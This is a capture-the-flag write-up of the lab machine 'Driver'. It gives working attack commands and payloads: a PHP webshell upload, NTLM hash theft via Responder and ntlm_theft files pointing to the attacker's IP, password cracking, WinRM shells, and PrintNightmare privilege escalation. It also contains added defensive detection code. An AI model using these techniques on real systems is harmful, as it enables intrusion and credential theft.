Footprinting
Open ports
First, let's use Nmap to scan the open ports:
kali@kali:~$ nmap -sS -p- -Pn -v10 -oA syn_full 10.10.11.106
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
kali@kali:~$ nmap -sC -sV -p80,135,445,5985 -Pn -v10 -oA vuln 10.10.11.106
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
It's a Windows machine, running an IIS web server on port 80, and another service on port 5985 (which we'll cover later).
HTTP
The first request asks for a username and password. Surprisingly, my first admin:admin attempt worked:
>>>
GET / HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
<<<
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25
Metasploit could have been used to brute-force the Basic authentication.
On the website, there are:
An upload page: /fw_up.php
An image: /images/ricoh.png
A possible hostname@domain: support@driver.htb
Rabbit Holes
Directory indexing is not enabled in /images:
>>>
GET /images/ HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
<<<
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0
Regarding the Host header, 10.10.11.106 driver.htb can be added to /etc/hosts. Indeed, some websites' behavior changes depending on the Host header:
The Host Header tells the webserver which virtual host to use (if set up). You can even have the same virtual host using several aliases (e.g. driver.htb, config.driver.htb, ...). In this case, you still have the possibility to read that header manually in your web app if you want to provide different behavior based on different domains addressed. This is possible because in your webserver you can (must?) set up one vhost to be the default host. This default vhost is used whenever the host header does not match any of the configured virtual hosts. A Host header field must be sent in all HTTP/1.1 request messages. A 400 (Bad Request) status code will be sent to any HTTP/1.1 request message that lacks a Host header field or contains more than one.
However, the website doesn't behave differently when driver.htb is requested. Looking for virtual hosts doesn't help either:
gobuster vhost -k -w /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt -u http://driver.htb/ -t 50 -H 'Authorization: Basic YWRtaW46YWRtaW4=' -q -o gobuster_vhosts.txt
Moving on, I see the /fw_up.php page has an upload feature. I could upload a PHP webshell:
>>>
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
Content-Type: multipart/form-data; boundary=---------------------------979429347213303672556720285
Authorization: Basic YWRtaW46YWRtaW4=
-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="printers"
HTB DesignJet
-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="firmware"; filename="simple-backdoor.php"
Content-Type: application/x-php
<?php system($_REQUEST['cmd']);?>
-----------------------------979429347213303672556720285--
<<<
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: fw_up.php?msg=SUCCESS
<<<
Select printer model and upload the respective firmware update to our file share.
Our testing team will review the uploads manually and initiates the testing soon.
But I don't know where the webshell is uploaded :-\
dirb (without forgetting the Authorization header) showed no sensitive URLs:
kali@kali:~$ dirb http://10.10.11.106/ /usr/share/dirb/wordlists/big.txt -H "Host: driver.htb" -H "Authorization: Basic YWRtaW46YWRtaW4=" -o dirb_80.txt
---- Scanning URL: http://10.10.11.106/ ----
==> DIRECTORY: http://10.10.11.106/images/
==> DIRECTORY: http://10.10.11.106/Images/
+ http://10.10.11.106/index.php (CODE:200|SIZE:4279)
No public vulnerabilities could be found for the PHP version reported in the response headers either :-/
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25
No backup files (e.g. index.php.bak, index.php~) could be found either :-[
kali@kali:~$ dirb http://10.10.11.106/index.php /usr/share/dirb/wordlists/mutations_common.txt -t
kali@kali:~$ dirb http://10.10.11.106/fw_up.php /usr/share/dirb/wordlists/mutations_common.txt -t
NTLM Hash Stealer & Responder
I finally got out of these rabbit holes! It is possible to steal the NTLM hash of a Windows user if the victim opens a malicious file:
Since MS08-068, you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the 'reflective' attack) unless you're performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.
SMB Signing needs to be disabled on the machine you're relaying to. With the exception of Windows Server OS's, all Windows operating systems have SMB Signing disabled by default.
Let's check if SMB Signing is disabled:
kali@kali:~$ crackmapexec smb 10.10.11.0/24 --gen-relay-list cme_smb_targets.txt
SMB 10.10.11.101 445 WRITER [*] Windows 6.1 Build 0 (name:WRITER) (domain:) (signing:False) (SMBv1:False)
SMB 10.10.11.102 445 EARTH [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
We're only interested in the DRIVER machine. The signing is set to False, which means NTLM hashes could be stolen! To do so, we need to poison the SMB service using responder:
kali@kali:~$ sudo responder -I tun0
Then, we can create a bunch of files linking to a nonexistent share on a host we own, using ntlm_theft:
ntlm_theft [...] generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network. The benefits of these file types over say macro based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.
kali@kali:~$ python ntlm_theft.py --generate all --server 10.10.15.101 --filename responder
My kali (10.10.15.101) is set as the server.
Uploading all of these files to the website, I realized the lnk extension worked!
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:67a7a5698e868c4b[...]
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
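As an added example (not code from the original post), here is the check a firmware-upload handler like the one behind /fw_up.php would want to run before a human reviewer opens a submission: the ntlm_theft documents only work because Windows follows an embedded UNC path, so the check looks for UNC references in both ASCII and UTF-16LE (the .lnk string encoding) and quarantines anything pointing at a host that is not allowlisted. The allowed extensions, the allowed share host and the sample files are assumptions made for the example.

```python
# Added example (not from the original post): a pre-review check for files dropped
# on an upload form like /fw_up.php. The ntlm_theft documents work because a
# reviewer opens them and Windows follows an embedded UNC path to a host the
# attacker controls, so any UNC reference to a non-allowlisted host is flagged.
import ipaddress
import re

ALLOWED_FIRMWARE_EXT = {".bin", ".fw", ".zip"}   # assumed: what real firmware looks like
ALLOWED_UNC_HOSTS = {"fileserver.driver.htb"}    # assumed: the company's real file share
# \\host\share, host = name or IP; the share name stops at the next backslash/space/NUL
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-_]+)\\([A-Za-z0-9.\-_$]+)")

# Constructed samples: a .url shortcut (ASCII), a .lnk icon path (UTF-16LE), clean binary
SAMPLE_URL = (b"[InternetShortcut]\r\nURL=file://10.10.15.101/responder\r\n"
              b"IconFile=\\\\10.10.15.101\\responder.ico\r\n")
SAMPLE_LNK_FRAGMENT = "\\\\10.10.15.101\\responder.ico".encode("utf-16-le")
SAMPLE_CLEAN_FW = b"\x7fFW\x00" + bytes(range(256))


def find_unc_refs(data: bytes):
    """Return (encoding, host, share) for every UNC path in the blob, scanning the
    bytes as-is (.url/.scf style text) and as UTF-16LE (how .lnk StringData is stored)."""
    hits = []
    for enc in ("latin-1", "utf-16-le"):
        text = data.decode(enc, errors="ignore")
        hits += [(enc, m.group(1), m.group(2)) for m in UNC_RE.finditer(text)]
    return hits


def host_verdict(host: str) -> str:
    """Label the host a UNC path points at; anything but 'allowed' is a red flag."""
    if host in ALLOWED_UNC_HOSTS:
        return "allowed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown-hostname"
    return "private-ip" if ip.is_private else "public-ip"


def review_upload(filename: str, data: bytes) -> dict:
    """Decide whether a human may open the upload, with the reasons if not."""
    reasons = []
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    if ext not in ALLOWED_FIRMWARE_EXT:
        reasons.append(f"extension {ext or '(none)'} is not a firmware type")
    for enc, host, share in find_unc_refs(data):
        verdict = host_verdict(host)
        if verdict != "allowed":
            reasons.append(f"UNC \\\\{host}\\{share} ({enc}) -> {verdict}")
    return {"filename": filename, "quarantine": bool(reasons), "reasons": reasons}
```

A real firmware image can legitimately contain a backslash pair by chance, so treat a hit on a file with an allowed extension as a reason to inspect rather than to reject outright.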
Then, the hash can be cracked:
kali@kali:~$ hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt /usr/share/wordlists/rockyou.txt -o hashcat.output
kali@kali:~$ cat hashcat.output
TONY::DRIVER:89a952d5d0ae0dc8:cb699871fdc24c0c7c573c39cb8f91e4:[...]:liltony
The credentials are tony:liltony!
Crackmapexec
Let's check we have access to the shares of the victim:
kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' --shares
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
SMB 10.10.11.106 445 DRIVER [+] Enumerated shares
SMB 10.10.11.106 445 DRIVER Share Permissions Remark
SMB 10.10.11.106 445 DRIVER ----- ----------- ------
SMB 10.10.11.106 445 DRIVER ADMIN$ Remote Admin
SMB 10.10.11.106 445 DRIVER C$ Default share
SMB 10.10.11.106 445 DRIVER IPC$ Remote IPC
Yes we have! Do we have RCE?
kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -x 'dir'
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -X 'dir'
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
Seems not :/
Note: the content of the shares tony can access is not interesting.
Evil Nightmare
user.txt
Remember that port 5985 was open?
PORT STATE SERVICE REASON
5985/tcp open wsman syn-ack ttl 127
This service is running WinRM:
If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.
I quickly found that evil-winrm can be used to exploit that service and get a shell:
kali@kali:~$ evil-winrm -i 10.10.11.106 -u tony -p liltony -P 5985
PS > C:\Users\tony\Documents> whoami
driver\tony
The user flag is:
PS > C:\Users\tony\Desktop> ls
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/13/2021 11:31 AM 1250056 mimi.exe
-ar--- 12/13/2021 9:05 AM 34 user.txt
-a---- 12/13/2021 11:18 AM 1927680 win.exe
PS > C:\Users\tony\Desktop> cat user.txt
c11[...]6c5
Note: it is possible to use an Empire listener and stager to get a reverse shell, as no antivirus blocks it.
Similar to /var/www/html in Linux, Microsoft IIS stores the website contents in C:\inetpub\ by default.
C:\inetpub\wwwroot contains all the web pages and content that will be published on the web. It is the default directory for publishing web pages.
PS C:\inetpub\wwwroot> Get-ChildItem -recurse .
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/7/2021 11:29 PM images
-a---- 9/8/2021 5:06 AM 6136 fw_up.php
-a---- 9/8/2021 4:51 AM 4906 index.php
Directory: C:\inetpub\wwwroot\images
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/7/2021 11:29 PM 201503 ricoh.png
Nothing really interesting in the source code, except that the firmware files are uploaded to C:\firmwares:
if($_SERVER['REQUEST_METHOD']=="POST"){
$target_dir = "C:\\firmwares\\";
root.txt
In the C:\temp\ directory, there is a folder z87179L19:
PS C:\temp\z87179L19> Get-ChildItem .
Directory: C:\temp\z87179L19
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/11/2021 7:20 AM disk1
d----- 6/11/2021 7:20 AM misc
Googling that directory quickly shows that the machine could be vulnerable to local privilege escalation:
A vulnerability affects several Windows printer drivers for a wide range of printers from Ricoh manufacture. The improperly protected library files are loaded by PrintIsolationHost.exe, a process running as SYSTEM.
Note: I couldn't use Metasploit to exploit that service.
After some time, I realized that Print Nightmare was the way to go. Indeed:
The website contains an image of the RICOH printer, and the machine is named Driver;
This CTF was released in 2021;
Print Nightmare was discovered in 2021 (CVE-2021-34527).
More information here:
The Print Spooler (spoolsv.exe) is a Windows service that handles print jobs. The description of the service is: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers." The service runs by default on both Windows servers and clients.
PS > Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
A PowerShell version of the exploit has been developed by Caleb Stewart & John Hammond. This script uses the Print Spooler local privilege escalation to create a local administrator account:
PS > Import-Module ./CVE-2021-1675.ps1
PS > Invoke-Nightmare -NewUser "jamarir" -NewPassword "jamarir" -DriverName "PrintMe"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user jamarir as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PS > net users jamarir
User name jamarir
[...]
Local Group Memberships *Administrators
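From the defender's side, the two things Invoke-Nightmare leaves in the logs are a printer driver installed through the spooler and a new member in the local Administrators group; the added example below (not code from the original post or the exploit authors) correlates those two Windows events. The event IDs are the real ones (316 in Microsoft-Windows-PrintService/Operational, 4732 in Security); the event records, the field names and the 60-second window are assumptions constructed for the example.

```python
# Added example (not from the original post): a correlation rule for what the
# Invoke-Nightmare output above shows: a printer driver is added through the
# spooler, then a new account appears in the local Administrators group.
# Event IDs are real; the records, their field names and the window are constructed.
from datetime import datetime, timedelta

PRINT_DRIVER_ADDED = 316         # "Printer driver <name> ... was added or updated"
LOCAL_GROUP_MEMBER_ADDED = 4732  # "A member was added to a security-enabled local group"
WINDOW = timedelta(seconds=60)   # assumed: how close the two events must be

SAMPLE_EVENTS = [  # constructed, already sorted by time
    {"time": "2021-12-13T11:40:02", "host": "DRIVER", "id": 316,
     "channel": "Microsoft-Windows-PrintService/Operational",
     "driver": "PrintMe", "user": "DRIVER\\tony"},
    {"time": "2021-12-13T11:40:03", "host": "DRIVER", "id": 4732,
     "channel": "Security", "group": "Administrators", "member": "jamarir"},
    {"time": "2021-12-13T11:55:00", "host": "DRIVER", "id": 4732,   # routine admin work,
     "channel": "Security", "group": "Administrators", "member": "helpdesk"},  # no 316 nearby
]


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def correlate(events: list, window: timedelta = WINDOW) -> list:
    """One alert per 4732-into-Administrators that follows a 316 on the same
    host within `window`; a lone 4732 is left to the normal admin-change review."""
    driver_adds = [e for e in events if e["id"] == PRINT_DRIVER_ADDED]
    alerts = []
    for e in events:
        if e["id"] != LOCAL_GROUP_MEMBER_ADDED or e.get("group") != "Administrators":
            continue
        for d in driver_adds:
            gap = _ts(e) - _ts(d)          # negative gap = driver added after the account
            if d["host"] == e["host"] and timedelta(0) <= gap <= window:
                alerts.append({"host": e["host"], "driver": d["driver"],
                               "driver_added_by": d["user"], "new_admin": e["member"],
                               "seconds_apart": gap.total_seconds()})
    return alerts
```

The PrintService/Operational channel is disabled by default, so event 316 only exists on hosts where that log has been switched on.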
Finally, we can use Evil-WinRM again to connect with that administrator account and grab the root flag:
kali@kali:~$ evil-winrm -i 10.10.11.106 -u jamarir -p jamarir -P 5985
PS > C:\Users\jamarir\Documents> whoami
driver\jamarir
PS > Get-Content C:\Users\Administrator\Desktop\root.txt
7cd[...]c3b
Don't forget to clean up behind you :)
PS > rm C:\temp\htb_jamarir